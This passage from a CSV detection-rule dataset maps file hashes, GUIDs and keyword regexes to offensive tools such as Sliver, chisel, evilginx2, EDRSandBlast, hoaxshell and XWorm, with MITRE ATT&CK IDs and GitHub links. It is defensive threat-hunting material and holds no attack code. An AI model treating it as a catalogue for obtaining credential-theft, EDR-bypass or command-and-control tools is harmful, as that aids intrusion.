fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061*",".{0,1000}7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b*",".{0,1000}7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb*",".{0,1000}7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: 
https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137*",".{0,1000}7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" 
"*7E47D586-DDC6-4382-848C-5CF0798084E1*",".{0,1000}7E47D586\-DDC6\-4382\-848C\-5CF0798084E1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7*",".{0,1000}7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854*",".{0,1000}7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*",".{0,1000}7E9729AA\-4CF2\-4D0A\-8183\-7FB7CE7A5B1A.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - 
T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z"
"*7EE536AE-6C1D-4881-88F7-37C8F2A0CA50*",".{0,1000}7EE536AE\-6C1D\-4881\-88F7\-37C8F2A0CA50.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z"
"*7etsuo/ShellServe*",".{0,1000}7etsuo\/ShellServe.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","6","1","N/A","N/A","N/A","N/A" "*7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23*",".{0,1000}7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1*",".{0,1000}7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e*",".{0,1000}7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4*",".{0,1000}7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6*",".{0,1000}7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5*",".{0,1000}7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c*",".{0,1000}7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c*",".{0,1000}7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108*",".{0,1000}7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a*",".{0,1000}7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*",".{0,1000}7H0LmBxFtXBPd0\/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*",".{0,1000}7L0LgBxFtTDc093TPe\/dntnM7G6Sncm.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*7z2john.pl*",".{0,1000}7z2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*80 253 149 118 169 176 183 169 182 184*",".{0,1000}80\s253\s149\s118\s169\s176\s183\s169\s182\s184.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" 
"*8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b*",".{0,1000}8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5*",".{0,1000}80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d*",".{0,1000}805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22*",".{0,1000}806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4*",".{0,1000}80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30*",".{0,1000}80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b*",".{0,1000}80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6*",".{0,1000}80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551*",".{0,1000}810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa*",".{0,1000}811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a*",".{0,1000}815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf*",".{0,1000}815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" 
"*81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776*",".{0,1000}81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec*",".{0,1000}81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d*",".{0,1000}81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab*",".{0,1000}81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" 
